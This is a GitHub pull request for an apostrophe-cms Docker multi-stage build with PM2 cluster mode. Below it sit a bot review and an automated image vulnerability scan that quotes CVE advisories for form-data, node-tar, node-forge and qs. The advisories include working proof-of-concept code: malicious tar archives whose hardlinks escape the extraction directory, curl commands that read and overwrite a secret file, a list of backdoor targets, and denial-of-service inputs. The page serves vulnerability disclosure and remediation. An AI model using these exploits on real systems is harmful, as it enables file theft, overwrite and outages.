
Conversation


@a-nomad a-nomad commented Jan 29, 2026

  • Converted the Dockerfile to a multi-stage build to reduce image size
  • Added the PM2 package for process management
  • Updated the production startup configuration to utilize all CPU cores instead of a single one

Optimized Docker image size using a multi-stage build that separates build-time and runtime dependencies, eliminating unnecessary layers from the final image. Enhanced production startup by replacing direct Node.js execution with PM2 cluster mode (pm2-runtime -i max), enabling automatic horizontal scaling across all available CPU cores for better resource utilization and improved application performance.


coderabbitai bot commented Jan 29, 2026

Walkthrough

This PR restructures the Docker build into a multi-stage pipeline with distinct build and runtime stages. The build stage introduces build-time arguments (NODE_ENV, NPM_INSTALL_FLAGS) and runs npm ci with the specified flags, while the runtime stage creates a non-root user, installs wget, and copies the built application from the build stage. Additionally, the start script in package.json is updated to use pm2-runtime with horizontal scaling instead of direct Node invocation, and pm2-runtime is added as a runtime dependency.
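
As a rough illustration (not the actual diff in this PR), a Dockerfile following the shape described above might look like the sketch below. The stage names, file paths, the app.js entry point, the presence of a build step, and the exact npm/PM2 invocations are assumptions for illustration only.

# Build stage: install dependencies (and build, if the project defines a build step)
FROM node:23-alpine AS build
ARG NODE_ENV=production
ARG NPM_INSTALL_FLAGS=""
ENV NODE_ENV=$NODE_ENV
WORKDIR /app
COPY package*.json ./
RUN npm ci $NPM_INSTALL_FLAGS
COPY . .
RUN npm run build

# Runtime stage: minimal image containing only what the app needs at runtime
FROM node:23-alpine AS runtime
ENV NODE_ENV=production
RUN apk add --no-cache wget \
    && addgroup -S app && adduser -S app -G app
WORKDIR /app
COPY --from=build --chown=app:app /app ./
USER app
# package.json "start" would run the app under PM2 in cluster mode, e.g.:
#   "start": "pm2-runtime app.js -i max"
CMD ["npm", "start"]

Because the runtime stage copies only the built application, build-time dependencies and intermediate layers never reach the final image, which is what drives the size reduction described above.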

Possibly related PRs

🚥 Pre-merge checks | ✅ 3
✅ Passed checks (3 passed)
Check name | Status | Explanation
Description Check | ✅ Passed | Check skipped - CodeRabbit’s high-level summary is enabled.
Title check | ✅ Passed | The title accurately describes the main changes: multi-stage Docker build optimization and PM2 cluster mode enablement. However, it exceeds the recommended 75-character limit by 2 characters.
Docstring Coverage | ✅ Passed | No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.



@a-nomad a-nomad requested a review from IhorMasechko January 29, 2026 17:20
@github-actions

🔍 Vulnerabilities of apostrophe-cms:test

📦 Image Reference apostrophe-cms:test
digest: sha256:375137bd5fcb8d8ebf3f5e001f1f5ae1f87c4b650dc92a50e4f949be43437f24
vulnerabilities: critical: 1, high: 23, medium: 0, low: 0
platform: linux/amd64
size: 175 MB
packages: 986
📦 Base Image node:23-alpine
also known as
  • 23-alpine3.22
  • 23.11-alpine
  • 23.11-alpine3.22
  • 23.11.1-alpine
  • 23.11.1-alpine3.22
digest: sha256:b9d38d589853406ff0d4364f21969840c3e0397087643aef8eede40edbb6c7cd
vulnerabilities: critical: 0, high: 7, medium: 11, low: 4, unspecified: 3
critical: 1 high: 0 medium: 0 low: 0 form-data 4.0.2 (npm)

pkg:npm/form-data@4.0.2

critical 9.4: CVE-2025-7783 Use of Insufficiently Random Values

Affected range: >=4.0.0, <4.0.4
Fixed version: 4.0.4
CVSS Score: 9.4
CVSS Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
EPSS Score: 0.172%
EPSS Percentile: 39th percentile
Description

Summary

form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:

  1. can observe other values produced by Math.random in the target application, and
  2. can control one field of a request made using form-data

Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a value that contains the boundary, allowing them to inject additional parameters into the request.

This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.

Details

The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347

An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be an x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose).

PoC

PoC here: https://github.com/benweissmann/CVE-2025-7783-poc

Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).

Impact

For an application to be vulnerable, it must:

  • Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)
  • Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values.

If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
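
To make the injection mechanics concrete, here is a small self-contained sketch (not taken from the advisory) of how a multipart body is framed around a boundary, and how a field value that embeds a predicted boundary smuggles in an extra parameter. The buildMultipart helper and the field names are hypothetical stand-ins for what form-data does internally.

// Hypothetical illustration of the boundary-injection mechanism described above.
// buildMultipart mimics, in simplified form, how multipart fields are framed.
function buildMultipart(boundary, fields) {
  let body = '';
  for (const [name, value] of Object.entries(fields)) {
    body += `--${boundary}\r\n`;
    body += `Content-Disposition: form-data; name="${name}"\r\n\r\n`;
    body += `${value}\r\n`;
  }
  return body + `--${boundary}--\r\n`;
}

// Boundary the attacker has recovered by solving for the Math.random() state.
const predictedBoundary = 'boundary1234567890';

// The attacker only controls the "comment" field, but embeds the predicted
// boundary to terminate their part early and open a new, injected part.
const attackerValue =
  'hello\r\n' +
  `--${predictedBoundary}\r\n` +
  'Content-Disposition: form-data; name="role"\r\n\r\n' +
  'admin';

const body = buildMultipart(predictedBoundary, { comment: attackerValue });
console.log(body);
// A multipart parser on the receiving end now sees two fields:
// comment=hello and an injected role=admin.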

critical: 0 high: 3 medium: 0 low: 0 tar 7.4.3 (npm)

pkg:npm/tar@7.4.3

high 8.8: CVE-2026-23950 Improper Handling of Unicode Encoding

Affected range: <=7.5.3
Fixed version: 7.5.4
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
EPSS Score: 0.015%
EPSS Percentile: 3rd percentile
Description

TITLE: Race Condition in node-tar Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS

AUTHOR: Tomás Illuminati

Details

A race condition vulnerability exists in node-tar (v7.5.3) due to incomplete handling of Unicode path collisions in the path-reservations system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, on which this has been tested), the library fails to lock colliding paths (e.g., ß and ss), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a PathReservations system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently.

// node-tar/src/path-reservations.ts (Lines 53-62)
reserve(paths: string[], fn: Handler) {
    paths =
      isWindows ?
        ['win32 parallelization disabled']
      : paths.map(p => {
          return stripTrailingSlashes(
            join(normalizeUnicode(p)), // <- THE PROBLEM FOR MacOS FS
          ).toLowerCase()
        })

On macOS the filesystem confuses ß with ss, but the join(normalizeUnicode(p)) key computed here does not. For example:

bash-3.2$ printf "CONTENT_SS\n" > collision_test_ss
bash-3.2$ ls
collision_test_ss
bash-3.2$ printf "CONTENT_ESSZETT\n" > collision_test_ß
bash-3.2$ ls -la
total 8
drwxr-xr-x   3 testuser  staff    96 Jan 19 01:25 .
drwxr-x---+ 82 testuser  staff  2624 Jan 19 01:25 ..
-rw-r--r--   1 testuser  staff    16 Jan 19 01:26 collision_test_ss
bash-3.2$ 

PoC

const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct stream
const stream = new PassThrough();

const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Key 1: "f_ss"
const header1 = new tar.Header({
    path: 'collision_ss',
    mode: 0o644,
    size: contentA.length,
});
header1.encode();

// Key 2: "f_ß"
const header2 = new tar.Header({
    path: 'collision_ß',
    mode: 0o644,
    size: contentB.length,
});
header2.encode();

// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding

stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding

// End
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
    cwd: exploitDir,
    // Ensure jobs is high enough to allow parallel processing if locks fail
    jobs: 8 
});

stream.pipe(extract);

extract.on('end', () => {
    console.log('[*] Extraction complete');

    // Check what exists
    const files = fs.readdirSync(exploitDir);
    console.log('[*] Files in exploit dir:', files);
    files.forEach(f => {
        const p = path.join(exploitDir, f);
        const stat = fs.statSync(p);
        const content = fs.readFileSync(p, 'utf8');
        console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
    });

    if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
        console.log('[*] GOOD');
    } else {
        console.log('[-] No collision');
    }
});

Impact

This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because the library uses NFD Unicode normalization (under which ß and ss remain distinct), colliding paths are not properly serialized on filesystems that treat them as the same name (e.g., APFS, where ß collides with ss on the same inode). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive.


Remediation

Update path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en').

Users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data, should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this filesystem entry-name collision issue.


high 8.2: CVE-2026-24842 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range: <7.5.7
Fixed version: 7.5.7
CVSS Score: 8.2
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
EPSS Score: 0.027%
EPSS Percentile: 7th percentile
Description

Summary

node-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.

Details

The vulnerability exists in lib/unpack.js. When extracting a hardlink, two functions handle the linkpath differently:

Security check in [STRIPABSOLUTEPATH]:

const entryDir = path.posix.dirname(entry.path);
const resolved = path.posix.normalize(path.posix.join(entryDir, linkpath));
if (resolved.startsWith('../')) { /* block */ }

Hardlink creation in [HARDLINK]:

const linkpath = path.resolve(this.cwd, entry.linkpath);
fs.linkSync(linkpath, dest);

Example: An application extracts a TAR using tar.extract({ cwd: '/var/app/uploads/' }). The TAR contains entry a/b/c/d/x as a hardlink to ../../../../etc/passwd.

  • Security check resolves the linkpath relative to the entry's parent directory: a/b/c/d/ + ../../../../etc/passwd = etc/passwd. No ../ prefix, so it passes.

  • Hardlink creation resolves the linkpath relative to the extraction directory (this.cwd): /var/app/uploads/ + ../../../../etc/passwd = /etc/passwd. This escapes to the system's /etc/passwd.

The security check and hardlink creation use different starting points (entry directory a/b/c/d/ vs extraction directory /var/app/uploads/), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.

PoC

Setup

Create a new directory with these files:

poc/
├── package.json
├── secret.txt          ← sensitive file (target)
├── server.js           ← vulnerable server
├── create-malicious-tar.js
├── verify.js
└── uploads/            ← created automatically by server.js
    └── (extracted files go here)

package.json

{ "dependencies": { "tar": "^7.5.0" } }

secret.txt (sensitive file outside uploads/)

DATABASE_PASSWORD=supersecret123

server.js (vulnerable file upload server)

const http = require('http');
const fs = require('fs');
const path = require('path');
const tar = require('tar');

const PORT = 3000;
const UPLOAD_DIR = path.join(__dirname, 'uploads');
fs.mkdirSync(UPLOAD_DIR, { recursive: true });

http.createServer((req, res) => {
  if (req.method === 'POST' && req.url === '/upload') {
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', async () => {
      fs.writeFileSync(path.join(UPLOAD_DIR, 'upload.tar'), Buffer.concat(chunks));
      await tar.extract({ file: path.join(UPLOAD_DIR, 'upload.tar'), cwd: UPLOAD_DIR });
      res.end('Extracted\n');
    });
  } else if (req.method === 'GET' && req.url === '/read') {
    // Simulates app serving extracted files (e.g., file download, static assets)
    const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
    if (fs.existsSync(targetPath)) {
      res.end(fs.readFileSync(targetPath));
    } else {
      res.end('File not found\n');
    }
  } else if (req.method === 'POST' && req.url === '/write') {
    // Simulates app writing to extracted file (e.g., config update, log append)
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', () => {
      const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
      if (fs.existsSync(targetPath)) {
        fs.writeFileSync(targetPath, Buffer.concat(chunks));
        res.end('Written\n');
      } else {
        res.end('File not found\n');
      }
    });
  } else {
    res.end('POST /upload, GET /read, or POST /write\n');
  }
}).listen(PORT, () => console.log(`http://localhost:${PORT}`));

create-malicious-tar.js (attacker creates exploit TAR)

const fs = require('fs');

function tarHeader(name, type, linkpath = '', size = 0) {
  const b = Buffer.alloc(512, 0);
  b.write(name, 0); b.write('0000644', 100); b.write('0000000', 108);
  b.write('0000000', 116); b.write(size.toString(8).padStart(11, '0'), 124);
  b.write(Math.floor(Date.now()/1000).toString(8).padStart(11, '0'), 136);
  b.write('        ', 148);
  b[156] = type === 'dir' ? 53 : type === 'link' ? 49 : 48;
  if (linkpath) b.write(linkpath, 157);
  b.write('ustar\x00', 257); b.write('00', 263);
  let sum = 0; for (let i = 0; i < 512; i++) sum += b[i];
  b.write(sum.toString(8).padStart(6, '0') + '\x00 ', 148);
  return b;
}

// Hardlink escapes to parent directory's secret.txt
fs.writeFileSync('malicious.tar', Buffer.concat([
  tarHeader('d/', 'dir'),
  tarHeader('d/x', 'link', '../secret.txt'),
  Buffer.alloc(1024)
]));
console.log('Created malicious.tar');

Run

# Setup
npm install
echo "DATABASE_PASSWORD=supersecret123" > secret.txt

# Terminal 1: Start server
node server.js

# Terminal 2: Execute attack
node create-malicious-tar.js
curl -X POST --data-binary @malicious.tar http://localhost:3000/upload

# READ ATTACK: Steal secret.txt content via the hardlink
curl http://localhost:3000/read
# Returns: DATABASE_PASSWORD=supersecret123

# WRITE ATTACK: Overwrite secret.txt through the hardlink
curl -X POST -d "PWNED" http://localhost:3000/write

# Confirm secret.txt was modified
cat secret.txt

Impact

An attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:

Immediate (Read Attack): If the application serves extracted files, attacker can read any file readable by the process.

Conditional (Write Attack): If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.

Remote Code Execution / Server Takeover

Attack Vector | Target File | Result
SSH Access | ~/.ssh/authorized_keys | Direct shell access to server
Cron Backdoor | /etc/cron.d/*, ~/.crontab | Persistent code execution
Shell RC Files | ~/.bashrc, ~/.profile | Code execution on user login
Web App Backdoor | Application .js, .php, .py files | Immediate RCE via web requests
Systemd Services | /etc/systemd/system/*.service | Code execution on service restart
User Creation | /etc/passwd (if running as root) | Add new privileged user

Data Exfiltration & Corruption

  1. Overwrite arbitrary files via hardlink escape + subsequent write operations
  2. Read sensitive files by creating hardlinks that point outside extraction directory
  3. Corrupt databases and application state
  4. Steal credentials from config files, .env, secrets

high 8.2: CVE-2026-23745 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range: <=7.5.2
Fixed version: 7.5.3
CVSS Score: 8.2
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N
EPSS Score: 0.007%
EPSS Percentile: 0th percentile
Description

Summary

The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets.

Details

The vulnerability exists in src/unpack.ts within the [HARDLINK] and [SYMLINK] methods.

1. Hardlink Escape (Arbitrary File Overwrite)

The extraction logic uses path.resolve(this.cwd, entry.linkpath) to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (entry.linkpath) is an absolute path, path.resolve ignores the first argument (this.cwd) entirely and returns the absolute path.

The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., /etc/passwd) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.

2. Symlink Poisoning

The extraction logic passes the user-supplied entry.linkpath directly to fs.symlink without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (../../), even when secure extraction defaults are used.

PoC

The following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to /etc/passwd). It then extracts the archive using standard node-tar settings and demonstrates the vulnerability by verifying that the local "secret" file was successfully overwritten.

const fs = require('fs')
const path = require('path')
const tar = require('tar')

const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'

// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')

// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
  path: 'exploit_hard',
  type: 'Link',
  size: 0,
  linkpath: secret 
})
h1.encode()

// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
  path: 'exploit_sym',
  type: 'SymbolicLink',
  size: 0,
  linkpath: targetSym 
})
h2.encode()

// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))

console.log('[*] Extracting malicious tarball...')

// 3. Extract with default secure settings
tar.x({
  cwd: out,
  file: tarFile,
  preservePaths: false
}).then(() => {
  console.log('[*] Verifying payload...')

  // Test Hardlink Overwrite
  try {
    fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
    
    if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
      console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
    } else {
      console.log('[-] Hardlink failed')
    }
  } catch (e) {}

  // Test Symlink Poisoning
  try {
    if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
      console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
    } else {
      console.log('[-] Symlink failed')
    }
  } catch (e) {}
})

Impact

  • Arbitrary File Overwrite: An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.
  • Remote Code Execution (RCE): In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all Link and SymbolicLink tar entries from extracted packages.)
critical: 0 high: 3 medium: 0 low: 0 tar 6.2.1 (npm)

pkg:npm/tar@6.2.1

high 8.8: CVE-2026-23950 Improper Handling of Unicode Encoding

Affected range: <=7.5.3
Fixed version: 7.5.4
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
EPSS Score: 0.015%
EPSS Percentile: 3rd percentile

high 8.2: CVE-2026-24842 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range: <7.5.7
Fixed version: 7.5.7
CVSS Score: 8.2
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
EPSS Score: 0.027%
EPSS Percentile: 7th percentile

high 8.2: CVE-2026-23745 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range: <=7.5.2
Fixed version: 7.5.3
CVSS Score: 8.2
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N
EPSS Score: 0.007%
EPSS Percentile: 0th percentile

See the tar 7.4.3 entries above for the full descriptions, PoCs, impact details, and remediation guidance for these three CVEs.
critical: 0 high: 3 medium: 0 low: 0 openssl 3.5.0-r0 (apk)

pkg:apk/alpine/openssl@3.5.0-r0?os_name=alpine&os_version=3.22

high: CVE-2025-9230

Affected range: <3.5.4-r0
Fixed version: 3.5.4-r0
EPSS Score: 0.029%
EPSS Percentile: 8th percentile
Description

high: CVE-2025-69420

Affected range: <3.5.5-r0
Fixed version: 3.5.5-r0
EPSS Score: 0.030%
EPSS Percentile: 8th percentile
Description

high: CVE-2025-69419

Affected range: <3.5.5-r0
Fixed version: 3.5.5-r0
EPSS Score: 0.030%
EPSS Percentile: 8th percentile
Description
critical: 0 high: 2 medium: 0 low: 0 node-forge 1.3.1 (npm)

pkg:npm/node-forge@1.3.1

high 8.7: CVE-2025-66031 Uncontrolled Recursion

Affected range: <1.3.2
Fixed version: 1.3.2
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score: 0.110%
EPSS Percentile: 30th percentile
Description

Summary

An Uncontrolled Recursion (CWE-674) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs.

Details

An ASN.1 Denial of Service (DoS) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing a very large nesting depth of constructed TLVs, which causes the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process handling the parse. This is a remote, low-cost Denial-of-Service against applications that parse untrusted ASN.1 objects.
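
A minimal sketch (not the reporter's PoC) of the kind of input that triggers the recursion, assuming node-forge is installed locally; the nesting depth below is an arbitrary illustrative value.

// Illustrative only: builds a small DER blob of deeply nested empty SEQUENCEs
// and feeds it to asn1.fromDer, which recurses once per nesting level.
const forge = require('node-forge');

// DER definite-length encoding (short form for < 128, long form otherwise).
function encodeLength(n) {
  if (n < 0x80) return Buffer.from([n]);
  const bytes = [];
  while (n > 0) { bytes.unshift(n & 0xff); n >>= 8; }
  return Buffer.from([0x80 | bytes.length, ...bytes]);
}

// Start from an empty SEQUENCE (0x30 0x00) and wrap it in many more
// constructed SEQUENCEs, one per nesting level.
let der = Buffer.from([0x30, 0x00]);
const depth = 20000; // illustrative; deep enough to exceed a typical V8 call stack
for (let i = 0; i < depth; i++) {
  der = Buffer.concat([Buffer.from([0x30]), encodeLength(der.length), der]);
}

try {
  forge.asn1.fromDer(forge.util.createBuffer(der.toString('binary')));
} catch (e) {
  // On unpatched versions this is expected to be
  // "Maximum call stack size exceeded".
  console.log(e.message);
}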

Impact

This vulnerability enables an unauthenticated attacker to reliably crash a server or client using node-forge for TLS connections or certificate parsing.

This vulnerability impacts the asn1.fromDer function in node-forge before patched version 1.3.2.

Any downstream application using this component is impacted. These components may be leveraged by downstream applications in ways that enable full compromise of availability.

high 8.7: CVE-2025-12816 Interpretation Conflict

Affected range: <1.3.2
Fixed version: 1.3.2
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.057%
EPSS Percentile: 18th percentile
Description

Summary

CVE-2025-12816 has been reserved by CERT/CC

Description
An Interpretation Conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.

Details

A critical ASN.1 validation bypass vulnerability exists in the node-forge asn1.validate function within forge/lib/asn1.js. ASN.1 is a schema language that defines data structures, like the typed record schemas used in X.509, PKCS#7, PKCS#12, etc. DER (Distinguished Encoding Rules), a strict binary encoding of ASN.1, is what cryptographic code expects when verifying signatures, and the exact bytes and structure must match the schema used to compute and verify the signature. After deserializing DER, Forge uses static ASN.1 validation schemas to locate the signed data or public key, compute digests over the exact bytes required, and feed digest and signature fields into cryptographic primitives.

This vulnerability allows a specially crafted ASN.1 object to desynchronize the validator on optional boundaries, causing a malformed optional field to be semantically reinterpreted as the subsequent mandatory structure. This manifests as logic bypasses in cryptographic algorithms and protocols with optional security features (such as PKCS#12, where MACs are treated as absent) and semantic interpretation conflicts in strict protocols (such as X.509, where fields are read as the wrong type).

Impact

This flaw allows an attacker to desynchronize the validator, allowing critical components like digital signatures or integrity checks to be skipped or validated against attacker-controlled data.

This vulnerability impacts the asn1.validate function in node-forge before patched version 1.3.2.
https://github.com/digitalbazaar/forge/blob/main/lib/asn1.js.

The following components in node-forge are impacted.
lib/asn1.js
lib/x509.js
lib/pkcs12.js
lib/pkcs7.js
lib/rsa.js
lib/pbe.js
lib/ed25519.js

Any downstream application using these components is impacted.

These components may be leveraged by downstream applications in ways that enable full compromise of integrity, leading to potential availability and confidentiality compromises.

critical: 0 high: 1 medium: 0 low: 0 qs 6.13.0 (npm)

pkg:npm/qs@6.13.0

high 8.7: CVE-2025-15284 Improper Input Validation

Affected range: <6.14.1
Fixed version: 6.14.1
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score: 0.150%
EPSS Percentile: 36th percentile
Description

Summary

The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.

Details

The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).

Vulnerable code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = utils.combine([], leaf);  // No arrayLimit check
}

Working code (lib/parse.js:175):

else if (index <= options.arrayLimit) {  // Limit checked here
    obj = [];
    obj[index] = leaf;
}

The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.

PoC

Test 1 - Basic bypass:

npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length);  // Output: 6 (should be max 5)

Test 2 - DoS demonstration:

const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Configuration:

  • arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
  • Use bracket notation: a[]=value (not indexed a[0]=value)

Impact

Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.

Attack scenario:

  1. Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
  2. Application parses with qs.parse(query, { arrayLimit: 100 })
  3. qs ignores limit, parses all 100,000 elements into array
  4. Server memory exhausted → application crashes or becomes unresponsive
  5. Service unavailable for all users

Real-world impact:

  • Single malicious request can crash server
  • No authentication required
  • Easy to automate and scale
  • Affects any endpoint parsing query strings with bracket notation

Suggested Fix

Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.

Current code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
        ? []
        : utils.combine([], leaf);  // No arrayLimit check
}

Fixed code:

if (root === '[]' && options.parseArrays) {
    // Use currentArrayLength already calculated at line 147-151
    if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
        throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
    }
    
    // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
    if (currentArrayLength >= options.arrayLimit) {
        obj = options.plainObjects ? { __proto__: null } : {};
        obj[currentArrayLength] = leaf;
    } else {
        obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
            ? []
            : utils.combine([], leaf);
    }
}

